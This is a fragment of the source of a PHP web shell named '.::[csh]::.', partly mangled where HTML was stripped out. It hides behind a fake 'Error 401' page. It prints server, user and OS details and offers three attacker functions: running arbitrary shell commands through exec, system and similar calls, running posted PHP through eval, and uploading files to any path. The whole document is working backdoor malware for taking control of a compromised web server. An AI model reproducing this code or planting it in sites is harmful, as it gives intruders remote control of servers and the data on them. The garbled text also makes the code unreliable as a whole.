Error 401

Unauthorized access!

"); } if($achtung) error_reporting(E_ALL&~E_NOTICE); else error_reporting(0); //--------------------- //get page generating time if (!function_exists("get_micro_time")) { function get_micro_time() { list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } } define("start_time",get_micro_time()); $cshver=".::[csh]::. v. 0.1.1 release"; //------------------------------- //normalize text encoding function decode($buffer){ return convert_cyr_string ($buffer, 'd', 'w'); } //--------------------------------- ?> .:[csh]:.| [".get_current_user()."@".$SERVER_NAME."]"; ?>

Server info:
"; ?>
".$SERVER_NAME."
"; echo "Server IP adress:".$server_ip=gethostbyname($SERVER_NAME)."
"; echo (($safe_mode)?("Safe Mode: ON
"): ("Safe Mode: OFF
")); echo "OS: "; if (empty($uname)){ echo (php_uname()."
"); }else echo $uname."

"; echo 'User: ' .get_current_user() . '
'; echo "HTTP Server: ".$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE']."
"; echo ("PHP: ".phpversion()."
"); echo ("MySQL: "); if($mysql_stat=function_exists('mysql_connect')){ echo "ON "; } else { echo "OFF
"; } //--------------------------- ?>
.::[Shell functions]::.
" title="./$shell">./ $shell
" title="PHP code execution">./php execution
" title="Upload file to server">./ upload file





"; $head_text="Shell:"; chdir($dir); function execute($com) { if (!empty($com)) { if(function_exists('exec')) { exec($com,$arr); echo implode(' ',$arr); } elseif(function_exists('shell_exec')) { echo shell_exec($com); } elseif(function_exists('system')) { echo system($com); } elseif(function_exists('passthru')) { echo passthru($com); } } } if ($cmd){ if($sertype == "winda"){ ob_start(); execute($cmd); $buffer = ""; $buffer = ob_get_contents(); ob_end_clean(); } else{ ob_start(); echo decode(execute($cmd)); $buffer = ""; $buffer = ob_get_contents(); ob_end_clean(); } if (trim($buffer)){ echo "

[".getcwd()."]
Executed command: [$cmd]
"; } } echo "
[".get_current_user()."@".$SERVER_NAME."]:
Current directory: \" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">
"; break; case "phpcode": $head_text="PHP code execution:"; echo "
PHP code:


\" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">
"; echo "
Results of PHP execution:
"; @eval(stripslashes($_POST['phpcode'])); echo "
"; break; case "upload": echo"
File:
Path:
"; if (isset($_POST['path'])){ $uploadfile = $_POST['path'].$_FILES['file']['name']; if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];} echo"
"; if (copy($_FILES['file']['tmp_name'], $uploadfile)) { echo "File sucessfuly uploaded in to directory: [$uploadfile]
"; echo "Name: [".$_FILES['file']['name']. "]
"; echo "Size: [" .$_FILES['file']['size']. "] Bytes
"; } else { print "Couldn't to upload file. Information:
"; print_r($_FILES); } echo"
"; } break; } ?>

[".round(get_micro_time()-start_time,4). "] seconds.]=-"; ?>